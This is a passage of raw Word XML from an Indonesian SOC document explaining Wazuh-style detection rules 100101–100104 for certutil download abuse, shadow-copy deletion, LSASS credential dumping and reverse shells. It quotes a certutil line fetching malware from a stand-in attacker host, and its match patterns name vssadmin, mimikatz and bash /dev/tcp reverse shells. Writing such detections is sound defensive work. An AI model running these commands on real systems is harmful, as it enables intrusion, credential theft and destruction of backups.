          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>certutil.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> secara digital ditandatangani oleh Microsoft Corporation, sehingga sistem keamanan dasar (seperti Antivirus tradisional) sering kali mempercayai proses tersebut. Peretas memanfaatkan celah kepercayaan ini dengan mengeksekusi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>certutil.exe -urlcache -split -f http://attacker-ip/malware.exe C:\temp\update.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Rule 100101 dirancang secara spesifik untuk menutup celah ini dengan menginspeksi argumen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-urlcache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, memastikan setiap upaya penyelundupan file langsung memicu alarm Level 8.</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100102 — Discovery or Shadow Copy Deletion Command Executed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id="100102" level="9"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;base_normalized&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;match&gt;whoami /priv|vssadmin delete shadows|wbadmin delete catalog|nltest /dclist&lt;/match&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;PROC: Discovery or shadow copy deletion command executed&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;process_execution,discovery,inhibit_system_recovery,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;mitre&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1490&lt;/id&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1033&lt;/id&gt;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100102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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Critical Warning / Impending Ransomware)</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p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>T1490:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Inhibit System Recovery*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>T1033:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>System Owner/User Discovery*</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vssadmin delete shadows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Perintah penghapusan seluruh snapshot Volume Shadow Copies Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>wbadmin delete catalog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Perintah penghapusan katalog backup Windows Server Backup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>whoami /priv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: Pemeriksaan hak akses token keamanan lokal (eksplorasi hak istimewa seperti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SeDebugPrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> atau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SeImpersonatePrivilege</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nltest /dclist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Enumerasi daftar Domain Controller dalam jaringan Active Directory.</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100102 bertindak sebagai detektor aksi sabotase sistem dan pengintaian mendalam (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Internal Discovery &amp; Sabotage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>). Perintah yang dicocokkan memiliki dampak yang sangat destruktif terhadap kelangsungan sistem cadangan (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>system restore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), sehingga dikategorisasikan pada tingkat keparahan sangat tinggi: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Level 9</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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Detektor Utama Pra-Ransomware (*Pre-Ransomware Tripwire*):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Memberikan sinyal darurat kepada analis SOC bahwa penyerang sedang melumpuhkan mekanisme pemulihan bencana sistem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Mendeteksi fase pengintaian hak istimewa pengguna (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>whoami /priv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) yang sering mendahului upaya eksploitasi token keamanan lokal (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Token Impersonation / RottenPotato / PrintSpoofer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Mencegah penyerang memetakan seluruh Domain Controller perusahaan via utilitas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nltest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D. Alasan Pembuatan &amp; Rasional Penyelamatan Aset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Tidak ada aktivitas bisnis atau pemeliharaan TI yang sah yang secara tiba-tiba menghapus seluruh Volume Shadow Copy menggunakan perintah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vssadmin delete shadows /all /quiet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Kehadiran perintah ini </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>99,9% merupakan indikator mutlak bahwa ransomware akan mengenkripsi seluruh harddisk dalam hitungan menit berikutnya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Dengan mendeteksi perintah ini di Level 9, tim SOC memiliki jendela waktu sempit untuk langsung mengisolasi host (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Host Containment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) dari jaringan sebelum bencana enkripsi terjadi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E0"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.4. RULE ID 100103 — Credential Dumping Utility / LSASS Access Attempted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id="100103" level="8"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;base_normalized&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;match&gt;mimikatz|sekurlsa::logonpasswords|procdump.*lsass&lt;/match&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;PROC: Credential dumping utility / LSASS access attempted&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;process_execution,credential_access,lsass_dump,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;mitre&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1003.001&lt;/id&gt;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100103</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Credential Theft)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T1003.001 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>OS Credential Dumping: LSASS Memory</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i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> `mimikatz`: Nama biner atau string perintah alat pencuri kredensial terpopuler di dunia (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Mimikatz*).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sekurlsa::logonpasswords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Modul Mimikatz spesifik yang mengekstrak password plaintext, NTLM hash, dan tiket Kerberos langsung dari memori proses LSASS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> `procdump.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>lsass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">: Penyalahgunaan utilitas resmi Sysinternals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>procdump.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> untuk mendump memori proses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>lsass.exe` ke sebuah file dump untuk diekstrak secara offline.</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100103 mengawasi pemanggilan alat dan teknik pencurian kredensial memori kernel. Proses Local Security Authority Subsystem Service (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) bertanggung jawab memverifikasi pengguna pada Windows. Penyerang yang memiliki hak lokal administrator akan berusaha membaca memori LSASS untuk mencuri password pengguna lain yang sedang aktif di komputer tersebut. Rule ini mendeteksi pola pencurian tersebut dan menetapkan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Mencegah eskalasi serangan dari satu komputer lokal menjadi kompromi seluruh domain perusahaan (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Domain Compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Menandai keberadaan utilitas eksploitasi credential theft di lingkungan produksi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Menjadi masukan berharga bagi tim Identity and Access Management (IAM) untuk segera me-reset kata sandi akun-akun yang berpotensi bocor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D. Alasan Pembuatan &amp; Urgensi Arsitektural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Teknik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sekurlsa::logonpasswords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> adalah metode utama yang digunakan peretas untuk mendapatkan tiket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Golden Ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> atau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Silver Ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kerberos. Begitu peretas berhasil mendump LSASS pada Domain Controller atau server kritis, seluruh akun perusahaan (termasuk akun direksi dan admin jaringan) berada dalam kendali penuh peretas. Rule 100103 memastikan setiap indikasi akses memori LSASS langsung ditindaklanjuti tanpa kompromi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E0"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.5. RULE ID 100104 — Interactive Reverse Shell Command Execution Detected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id="100104" level="10"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;base_normalized&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;match&gt;/bin/bash -i &gt;&amp;amp; /dev/tcp/|/bin/sh -i|nc -e /bin/bash|nc -e /bin/sh&lt;/match&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;PROC: Interactive Reverse Shell command execution detected&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;process_execution,command_and_control,reverse_shell,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;mitre&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1059.004&lt;/id&gt;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100104</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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Critical Emergency / Immediate Containment)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T1059.004 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Command and Scripting Interpreter: Unix Shell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/bin/bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Sintaks native bash socket redirection yang menghubungkan input/output shell langsung ke soket jaringan TCP penyerang.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/bin/sh -i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Pembukaan shell interaktif pada lingkungan non-TTY (sering dipicu oleh webshell atau payload exploit).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nc -e /bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nc -e /bin/sh</w:t>
      </w:r>
